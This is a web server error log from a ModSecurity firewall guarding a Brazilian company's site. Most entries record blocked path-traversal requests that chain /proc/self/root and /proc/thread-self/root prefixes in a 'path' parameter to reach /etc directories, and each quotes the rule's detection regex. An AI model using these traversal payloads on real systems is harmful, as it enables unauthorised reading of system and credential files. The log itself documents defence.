[Mon Mar 16 18:18:32.331415 2026] [:error] [pid 10651:tid 140411741927168] [client 74.7.243.203:34046] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzqLysWC90G-1nBrBhlAAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:33.452900 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.241.46:36478] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzqaTCbgAP5jq5TehIiQAAAsk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:36.749696 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.241.46:36486] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzrNSswJuvopo3lOh90AAAAIQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:37.954150 2026] [:error] [pid 21806:tid 140411699963648] [client 74.7.241.46:36488] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzrdSswJuvopo3lOh90QAAAIU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:39.132808 2026] [:error] [pid 10651:tid 140411632822016] [client 74.7.241.46:49170] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzr7ysWC90G-1nBrBhlQAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:47.091269 2026] [:error] [pid 15061:tid 140411666392832] [client 74.7.243.203:34056] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/binfmt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzt6TCbgAP5jq5TehIlgAAAsk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:18:47.402222 2026] [:error] [pid 21806:tid 140411733534464] [client 74.7.241.46:49176] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhzt9SswJuvopo3lOh92QAAAIE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:19:39.580156 2026] [:error] [pid 15061:tid 140411699963648] [client 74.7.241.46:60858] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhz66TCbgAP5jq5TehI0AAAAsU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:19:54.858195 2026] [:error] [pid 15568:tid 140411548894976] [client 74.7.243.203:60908] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhz-qQpVkWug9HeOt9Q2wAAA1c"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:19:56.200175 2026] [:error] [pid 21806:tid 140411574073088] [client 74.7.243.203:50022] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhz_NSswJuvopo3lOh97wAAAJQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:20:00.888860 2026] [:error] [pid 10651:tid 140411616036608] [client 74.7.244.31:45432] [client 74.7.244.31] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abh0ALysWC90G-1nBrBhrgAAAY8"]
[Mon Mar 16 18:20:07.223382 2026] [:error] [pid 10772:tid 140411708356352] [client 74.7.243.203:50036] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0B_9ocpUE4ed4uDwQ6gAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:20:28.136007 2026] [:error] [pid 10831:tid 140411683178240] [client 74.7.243.203:43564] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0HI6lpbStxTqkSkuGRgAAAkc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:20:30.589142 2026] [:error] [pid 10831:tid 140411666392832] [client 74.7.243.203:55872] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0Ho6lpbStxTqkSkuGSgAAAkk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:20:36.075006 2026] [:error] [pid 29802:tid 140411557287680] [client 74.7.243.203:43574] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0JM_BxrYCr4hPDw8HfQAAAdY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:20:51.395752 2026] [:error] [pid 10772:tid 140411565680384] [client 74.7.241.46:57060] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0M_9ocpUE4ed4uDwRGQAAAhU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:20:52.764629 2026] [:error] [pid 10772:tid 140411632822016] [client 74.7.241.46:36014] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0NP9ocpUE4ed4uDwRGgAAAg0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:21:46.267384 2026] [:error] [pid 21805:tid 140411540502272] [client 74.7.243.203:43580] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0arABkC4fWIHEf8EVhgAAAFg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 18:21:46.987478 2026] [:error] [pid 15061:tid 140411607643904] [client 74.7.241.46:36030] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0aqTCbgAP5jq5TehJTAAAAtA"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 18:21:48.431108 2026] [:error] [pid 29802:tid 140411658000128] [client 74.7.241.46:50514] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0bM_BxrYCr4hPDw8HjQAAAco"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 18:21:49.603490 2026] [:error] [pid 21806:tid 140411557287680] [client 74.7.241.46:50524] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0bdSswJuvopo3lOh-GwAAAJY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 18:21:51.914925 2026] [:error] [pid 15061:tid 140411599251200] [client 74.7.241.46:50534] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abh0b6TCbgAP5jq5TehJUQAAAtE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
